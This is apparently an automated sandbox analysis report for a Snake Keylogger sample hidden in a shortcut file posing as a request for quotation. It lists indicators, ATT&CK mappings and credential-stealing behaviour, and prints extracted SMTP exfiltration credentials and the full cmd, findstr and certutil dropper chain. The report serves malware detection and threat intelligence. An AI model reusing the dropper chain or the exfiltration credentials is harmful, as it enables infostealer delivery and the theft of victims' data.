snakekeylogger | 32540260cd472fad0798b97d44b8487c1bb9f18f7b68cfd3b2a01c457372fd4f

General

Target

RFQ2310113.lnk
Size

189KB
MD5

b63351d03fd881836a5ac5e41a9dcfd3
SHA1

ef1527ae584e66a30f6445ef7aa24fb0a224ee38
SHA256

32540260cd472fad0798b97d44b8487c1bb9f18f7b68cfd3b2a01c457372fd4f
SHA512

df063d7698db772421d3ed92f543cf96e34f171eb32b1efcb15572c639d670aad08e2178297f8c660eb4cba619bfeb21a4a0302f7cb9ca472668d83be1e5e6fc
SSDEEP

3072:dKYPSEKR8itPqPiGjuyLAfOjRBM/JgQMHMJJP7TWRhby:XP/KR8SZggG/SJgdOJP7TWRh+

Score

10^/10

snakekeylogger collection keylogger spyware stealer

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
mail.avtorska.com.mk
Port:
587
Username:
[email protected]
Password:
avtorska2014@

Extracted

Family

snakekeylogger

Credentials

Protocol: smtp
Host:
mail.avtorska.com.mk
Port:
587
Username:
[email protected]
Password:
avtorska2014@
Email To:
[email protected]

Signatures

Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger

Snake Keylogger payload 4 IoCs

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk	family_snakekeylogger
C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk	family_snakekeylogger
C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk	family_snakekeylogger
behavioral1/memory/2640-43-0x000000013FEC0000-0x000000013FEE6000-memory.dmp	family_snakekeylogger

Executes dropped EXE 1 IoCs

Processes:

82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk

pid process

2640 82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk
Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid process

2328 cmd.exe
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
2640	82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk

pid	process
2328	cmd.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk
Key opened	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk
Key opened	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

4 checkip.dyndns.org
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk

pid process

2640 82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk
2640 82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk

description pid process

Token: SeDebugPrivilege 2640 82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk

flow	ioc
4	checkip.dyndns.org

pid	process
2640	82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk
2640	82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk

description	pid	process
Token: SeDebugPrivilege	2640	82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 1872 wrote to memory of 2328	1872	cmd.exe	cmd.exe
PID 1872 wrote to memory of 2328	1872	cmd.exe	cmd.exe
PID 1872 wrote to memory of 2328	1872	cmd.exe	cmd.exe
PID 2328 wrote to memory of 2592	2328	cmd.exe	findstr.exe
PID 2328 wrote to memory of 2592	2328	cmd.exe	findstr.exe
PID 2328 wrote to memory of 2592	2328	cmd.exe	findstr.exe
PID 2328 wrote to memory of 2708	2328	cmd.exe	certutil.exe
PID 2328 wrote to memory of 2708	2328	cmd.exe	certutil.exe
PID 2328 wrote to memory of 2708	2328	cmd.exe	certutil.exe
PID 2328 wrote to memory of 2640	2328	cmd.exe	82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk
PID 2328 wrote to memory of 2640	2328	cmd.exe	82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk
PID 2328 wrote to memory of 2640	2328	cmd.exe	82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk

outlook_office_path 1 IoCs

Processes:

82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk

outlook_win_path 1 IoCs

Processes:

82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\RFQ2310113.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1872

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k "0BuHTtq7wyB1e3BR7VXBN1JkltCcyzcwj2TbqvGICjdRaiKsYpN3v2eOjdUTzBa44CdlUa8Dk8nd6UzvdBO78TnEaTdWGJec6mhskAtO8dN436zlURDoitxKJRTseR89a3r1HGeeeuoJAAchkhrhHGJyCinsRMHeywDbsaAhIuV8akh6A3hRliUnZQvl1fouGSZQuASgVQ1lphfxvsexc9UWyYbtJjzlw9Mc8wYgvgJmW74AXJMP6I6Cio & findstr "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAA" RFQ2310113.lnk>C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.tmp & certutil -decode C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.tmp C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk & start C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk & del C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.tmp & exit & 0BuHTtq7wyB1e3BR7VXBN1JkltCcyzcwj2TbqvGICjdRaiKsYpN3v2eOjdUTzBa44CdlUa8Dk8nd6UzvdBO78TnEaTdWGJec6mhskAtO8dN436zlURDoitxKJRTseR89a3r1HGeeeuoJAAchkhrhHGJyCinsRMHeywDbsaAhIuV8akh6A3hRliUnZQvl1fouGSZQuASgVQ1lphfxvsexc9UWyYbtJjzlw9Mc8wYgvgJmW74AXJMP6I6Cio"
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2328

C:\Windows\system32\findstr.exe
findstr "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAA" RFQ2310113.lnk
3⤵
PID:2592

C:\Windows\system32\certutil.exe
certutil -decode C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.tmp C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk
3⤵
PID:2708

C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk
C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk
3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

2

T1552

Credentials In Files

2

T1552.001

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Data from Local System

Email Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk

Filesize
139KB

MD5
4125ea2fb2e0729c7feee51c859ada21

SHA1
21e47553ff803b30c7fdc7be618a7443e37297bb

SHA256
32a063afcf2fba7e086632f90a32280448ad07c105d340cd44b079466ccb661d

SHA512
37bb2ab066b482931ca81c29ee116825d2a8786ef319ee658e883338a36ab612c8bebf34f5b1fae46797bf72fdfe6a26eed238015a225d7b2423c6190c81650d

Download Submit
C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk

Filesize
139KB

MD5
4125ea2fb2e0729c7feee51c859ada21

SHA1
21e47553ff803b30c7fdc7be618a7443e37297bb

SHA256
32a063afcf2fba7e086632f90a32280448ad07c105d340cd44b079466ccb661d

SHA512
37bb2ab066b482931ca81c29ee116825d2a8786ef319ee658e883338a36ab612c8bebf34f5b1fae46797bf72fdfe6a26eed238015a225d7b2423c6190c81650d

Download Submit
C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.tmp

Filesize
186KB

MD5
8a33bf953de2c0fbba1c4d84912ef6a2

SHA1
4c97c27f7e33f03f4e62f80eeb1a9f632b78b77c

SHA256
f77c8b20606c1deac4ecfb4dbaa266d0909d9ea87912b0beeb99fc0766b3607f

SHA512
41ecfc158423f7b6441c2f0f7a9703b7e6990f724c569ca0edd7f4aa4d812e641dd8b4841c1b9b9d7e91ae7dcdbfa0cdc1878f26d0b6baa3af3dc46d03d651f1

Download Submit
\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk

Filesize
139KB

MD5
4125ea2fb2e0729c7feee51c859ada21

SHA1
21e47553ff803b30c7fdc7be618a7443e37297bb

SHA256
32a063afcf2fba7e086632f90a32280448ad07c105d340cd44b079466ccb661d

SHA512
37bb2ab066b482931ca81c29ee116825d2a8786ef319ee658e883338a36ab612c8bebf34f5b1fae46797bf72fdfe6a26eed238015a225d7b2423c6190c81650d

Download Submit
memory/2640-43-0x000000013FEC0000-0x000000013FEE6000-memory.dmp

Filesize
152KB

Download
memory/2640-44-0x000007FEF5BB0000-0x000007FEF659C000-memory.dmp

Filesize
9.9MB

Download
memory/2640-45-0x000000001BA50000-0x000000001BAD0000-memory.dmp

Filesize
512KB

Download
memory/2640-46-0x000007FEF5BB0000-0x000007FEF659C000-memory.dmp

Filesize
9.9MB

Download
memory/2640-47-0x000000001BA50000-0x000000001BAD0000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads